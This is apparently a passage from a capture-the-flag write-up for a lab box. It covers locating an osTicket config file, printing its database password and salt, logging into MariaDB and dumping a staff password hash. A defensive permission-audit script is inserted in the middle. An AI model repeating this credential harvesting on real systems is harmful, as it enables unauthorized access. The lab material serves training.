osTicket


After doing some basic enumeration, I decided to check for the installation directory of the osTicket instance.

maildeliverer@delivery:/var/www/osticket/upload$ ls
account.php  assets         client.inc.php  include    login.php     manage.php   profile.php     tickets.php
ajax.php     avatar.php     css             index.php  logo.php      offline.php  pwreset.php     view.php
api          bootstrap.php  file.php        js         logout.php    open.php     scp             web.config
apps         captcha.php    images          kb         main.inc.php  pages        secure.inc.php

It’s located at the /var/www/osticket/upload directory.

maildeliverer@delivery:/var/www/osticket/upload/include$ sed '/^#/d' ost-config.php 
<?php
/*********************************************************************
    ost-config.php
 
    Static osTicket configuration file. Mainly useful for mysql login info.
    Created during installation process and shouldn't change even on upgrades.
 
    Peter Rotich <peter@osticket.com>
    Copyright (c)  2006-2010 osTicket
    http://www.osticket.com
 
    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    See LICENSE.TXT for details.
 
    vim: expandtab sw=4 ts=4 sts=4:
    $id: $
**********************************************************************/
 
if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
    die('kwaheri rafiki!');
 
define('OSTINSTALLED',TRUE);
if(OSTINSTALLED!=TRUE){
    if(!file_exists(root_dir.'setup/install.php')) die('error: Contact system admin.'); //Something is really wrong!
    //Invoke the installer.
    header('location: '.ROOT_PATH.'setup/install.php');
    exit;
}
 
define('SECRET_SALT','nP8uygzdkzXRLJzYUmdmLDEqDSq5bGk3');
 
define('ADMIN_EMAIL','maildeliverer@delivery.htb');
 
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
 
define('TABLE_PREFIX','ost_');
 
 
 
 
 
 
 
 
 
define('TRUSTED_PROXIES', '');
 
 
 
define('LOCAL_NETWORKS', '127.0.0.0/24');
 
 
?>

I found a file containing a DB credential: include/ost-config.php. The DB credential is ost_user:!H3lpD3sk123!
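A defender-side check for the exposure shown above, as an added example that is not part of the original write-up or of osTicket: it reports when a PHP config file carrying `DBPASS` or `SECRET_SALT` is readable by accounts outside its owner and group, without echoing the secret values. The sample file contents, the `0o644`/`0o640` modes and the function names are constructed for the demonstration; the page does not show the real file's mode.

```python
import os
import re
import stat
import tempfile

# Constant names treated as secrets; both appear in the ost-config.php listing.
SECRET_KEYS = {"DBPASS", "SECRET_SALT"}
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def audit_config(path):
    """Return mode, secret-bearing constant names and findings; never the values."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        defines = dict(DEFINE_RE.findall(fh.read()))
    secrets = sorted(k for k, v in defines.items() if k in SECRET_KEYS and v)
    findings = []
    if secrets and mode & stat.S_IROTH:
        findings.append(f"{oct(mode)}: readable by any local user, holds {', '.join(secrets)}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{oct(mode)}: writable by group or other")
    return {"mode": oct(mode), "secrets": secrets, "findings": findings}


def demo():
    """Audit a constructed config at a weak mode, then at a tightened one."""
    sample = (
        "<?php\n"
        "define('DBUSER','app_user');\n"
        "define('DBPASS','constructed-placeholder');\n"
        "define('SECRET_SALT','constructed-salt');\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "ost-config.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, 0o644)   # weak: every local account can read the secrets
        weak = audit_config(path)
        os.chmod(path, 0o640)   # tightened: owner plus the web server's group only
        fixed = audit_config(path)
    return weak, fixed


if __name__ == "__main__":
    for result in demo():
        print(result)
```
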

Local DB


maildeliverer@Delivery:/var/www/osticket/upload$ mysql -u ost_user -p'!H3lpD3sk123!'
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 247
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 

I was able to authenticate to the local mysqld service, using the

DB


MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| osticket           |
+--------------------+
2 rows in set (0.001 sec)
 
MariaDB [(none)]> use osticket;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

Checking the osticket DB

Tables


MariaDB [osticket]> show tables;
+--------------------------+
| Tables_in_osticket       |
+--------------------------+
| ost__search              |
| ost_api_key              |
| ost_attachment           |
| ost_canned_response      |
| ost_config               |
| ost_content              |
| ost_department           |
| ost_draft                |
| ost_email                |
| ost_email_account        |
| ost_email_template       |
| ost_email_template_group |
| ost_event                |
| ost_faq                  |
| ost_faq_category         |
| ost_faq_topic            |
| ost_file                 |
| ost_file_chunk           |
| ost_filter               |
| ost_filter_action        |
| ost_filter_rule          |
| ost_form                 |
| ost_form_entry           |
| ost_form_entry_values    |
| ost_form_field           |
| ost_group                |
| ost_help_topic           |
| ost_help_topic_form      |
| ost_list                 |
| ost_list_items           |
| ost_lock                 |
| ost_note                 |
| ost_organization         |
| ost_plugin               |
| ost_queue                |
| ost_queue_column         |
| ost_queue_columns        |
| ost_queue_config         |
| ost_queue_export         |
| ost_queue_sort           |
| ost_queue_sorts          |
| ost_role                 |
| ost_schedule             |
| ost_schedule_entry       |
| ost_sequence             |
| ost_session              |
| ost_sla                  |
| ost_staff                |
| ost_staff_dept_access    |
| ost_syslog               |
| ost_task                 |
| ost_task__cdata          |
| ost_team                 |
| ost_team_member          |
| ost_thread               |
| ost_thread_collaborator  |
| ost_thread_entry         |
| ost_thread_entry_email   |
| ost_thread_entry_merge   |
| ost_thread_event         |
| ost_thread_referral      |
| ost_ticket               |
| ost_ticket__cdata        |
| ost_ticket_priority      |
| ost_ticket_status        |
| ost_translation          |
| ost_user                 |
| ost_user__cdata          |
| ost_user_account         |
| ost_user_email           |
+--------------------------+
70 rows in set (0.001 sec)

While there are 70 tables, I will check only those that are relevant to credentials.

osticket.ost_staff

MariaDB [osticket]> SELECT username,passwd FROM ost_staff;
+---------------+--------------------------------------------------------------+
| username      | passwd                                                       |
+---------------+--------------------------------------------------------------+
| maildeliverer | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy |
+---------------+--------------------------------------------------------------+
1 row in set (0.001 sec)

The maildeliverer user is the only staff member. It’s likely using the same passwd.

I can authenticate to the admin GUI panel, but there seems to be nothing useful. It seems to be a dead end here.